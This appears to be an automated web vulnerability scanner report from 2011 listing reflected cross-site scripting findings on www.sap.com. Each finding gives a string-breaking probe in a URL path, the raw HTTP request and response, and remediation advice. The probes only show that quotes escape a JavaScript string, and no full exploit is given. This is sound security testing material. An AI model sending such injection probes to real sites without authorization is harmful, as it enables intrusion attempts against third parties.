Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globalf57fc';c7151b9655c'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b81'%3bb6b8c9dfd1 was submitted in the REST URL parameter 1. This input was echoed as c9b81';b6b8c9dfd1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globalc9b81'%3bb6b8c9dfd1/js/jquery-1_3_2/jquery-1.3.2.min.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34321
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globalc9b81';b6b8c9dfd1'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0692'%3bc051f703da5 was submitted in the REST URL parameter 1. This input was echoed as a0692';c051f703da5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globala0692'%3bc051f703da5/js/menu.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34116
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:46 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globala0692';c051f703da5'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8adae'%3bc4f39aa5a5b was submitted in the REST URL parameter 1. This input was echoed as 8adae';c4f39aa5a5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8e2'%3b344ff4a6aa was submitted in the REST URL parameter 1. This input was echoed as be8e2';344ff4a6aa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globalbe8e2'%3b344ff4a6aa/js/rm_js/rm_browser.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34205
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globalbe8e2';344ff4a6aa'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df80d'%3b2cc172492f6 was submitted in the REST URL parameter 1. This input was echoed as df80d';2cc172492f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globaldf80d'%3b2cc172492f6/js/rm_js/rm_dhtml.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:41 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:41 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globaldf80d';2cc172492f6'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a719'%3b0d2f51e5aad was submitted in the REST URL parameter 1. This input was echoed as 4a719';0d2f51e5aad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /global4a719'%3b0d2f51e5aad/js/rm_js/rm_iframe.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34205
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:43 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:43 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='global4a719';0d2f51e5aad'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e6d5'%3b90fcd6ea8d3 was submitted in the REST URL parameter 1. This input was echoed as 5e6d5';90fcd6ea8d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /global5e6d5'%3b90fcd6ea8d3/js/roiengine.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34151
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='global5e6d5';90fcd6ea8d3'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7aaf'%3bbad30282377 was submitted in the REST URL parameter 1. This input was echoed as b7aaf';bad30282377 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globalb7aaf'%3bbad30282377/js/sap_flash_js.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34188
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:54 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:54 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globalb7aaf';bad30282377'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc39'%3bd5d71600491 was submitted in the REST URL parameter 1. This input was echoed as fbc39';d5d71600491 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /globalfbc39'%3bd5d71600491/js/search.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34130
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:44 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='globalfbc39';d5d71600491'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a0c'%3b4bbc571b8b1 was submitted in the REST URL parameter 1. This input was echoed as 81a0c';4bbc571b8b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /global81a0c'%3b4bbc571b8b1/js/workspace.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34151
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:49 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:49 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript"> var DOCUMENTGROUP='global81a0c';4bbc571b8b1'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87339'%3bd20b3e6e719 was submitted in the REST URL parameter 1. This input was echoed as 87339';d20b3e6e719 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb27d'%3b9f0814850ad was submitted in the REST URL parameter 1. This input was echoed as bb27d';9f0814850ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43183'%3b2484e654024 was submitted in the REST URL parameter 1. This input was echoed as 43183';2484e654024 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07cd'%3bec4edde2e02 was submitted in the REST URL parameter 1. This input was echoed as b07cd';ec4edde2e02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b671c'%3b543226d3f77 was submitted in the REST URL parameter 1. This input was echoed as b671c';543226d3f77 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c407'%3ba024c6ca314 was submitted in the REST URL parameter 1. This input was echoed as 9c407';a024c6ca314 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9aed'%3baf99673ff4a was submitted in the REST URL parameter 1. This input was echoed as a9aed';af99673ff4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e93a'%3bcbcf73c2e51 was submitted in the REST URL parameter 1. This input was echoed as 2e93a';cbcf73c2e51 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3df'%3b7dc9d8a7f02 was submitted in the REST URL parameter 1. This input was echoed as 6a3df';7dc9d8a7f02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d6ae'%3bca47a3e20cd was submitted in the REST URL parameter 1. This input was echoed as 7d6ae';ca47a3e20cd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8c79'%3b413038ff152 was submitted in the REST URL parameter 1. This input was echoed as c8c79';413038ff152 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673b1'%3b54f56dbaa52 was submitted in the REST URL parameter 1. This input was echoed as 673b1';54f56dbaa52 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a05b7'%3b45b4788a8c7 was submitted in the REST URL parameter 1. This input was echoed as a05b7';45b4788a8c7 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a27'%3b9799824c8c5 was submitted in the REST URL parameter 1. This input was echoed as a1a27';9799824c8c5 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36482'%3b07344e13425 was submitted in the REST URL parameter 1. This input was echoed as 36482';07344e13425 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c2e'%3b24783e50e3c was submitted in the REST URL parameter 1. This input was echoed as 56c2e';24783e50e3c in the application's response.
Request
GET /global56c2e'%3b24783e50e3c/ui/js/samlscript.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34194
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:35 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:35 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script langua ...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global56c2e';24783e50e3c';
var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4a85'%3bc5184766698 was submitted in the REST URL parameter 1. This input was echoed as e4a85';c5184766698 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 183b0'%3b403f5d13ed4 was submitted in the REST URL parameter 1. This input was echoed as 183b0';403f5d13ed4 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbae5'%3b6927fdc0b2c was submitted in the REST URL parameter 1. This input was echoed as dbae5';6927fdc0b2c in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f84b'%3b8f94007213d was submitted in the REST URL parameter 1. This input was echoed as 2f84b';8f94007213d in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1088e'%3bc4287d6548d was submitted in the REST URL parameter 1. This input was echoed as 1088e';c4287d6548d in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d56'%3b550ae090394 was submitted in the REST URL parameter 1. This input was echoed as b5d56';550ae090394 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d960e'%3bdf9b76a1320 was submitted in the REST URL parameter 1. This input was echoed as d960e';df9b76a1320 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aa40'%3b4c4ad194a39 was submitted in the REST URL parameter 1. This input was echoed as 9aa40';4c4ad194a39 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11690'%3bb040f2da0c1 was submitted in the REST URL parameter 1. This input was echoed as 11690';b040f2da0c1 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4781'%3b89984ca68ca was submitted in the REST URL parameter 1. This input was echoed as a4781';89984ca68ca in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba74a'%3b879ffb992f was submitted in the REST URL parameter 1. This input was echoed as ba74a';879ffb992f in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70a4b'%3b08e671c02b9 was submitted in the REST URL parameter 1. This input was echoed as 70a4b';08e671c02b9 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 897e8'%3b64a37e8a73 was submitted in the REST URL parameter 1. This input was echoed as 897e8';64a37e8a73 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e3bb'%3b2cab67335f7 was submitted in the REST URL parameter 1. This input was echoed as 1e3bb';2cab67335f7 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37f00'%3b2a454ffd699 was submitted in the REST URL parameter 1. This input was echoed as 37f00';2a454ffd699 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2702'%3b754dccb0264 was submitted in the REST URL parameter 1. This input was echoed as e2702';754dccb0264 in the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c50'%3ba5ea46ddd56 was submitted in the REST URL parameter 1. This input was echoed as 70c50';a5ea46ddd56 in the application's response.
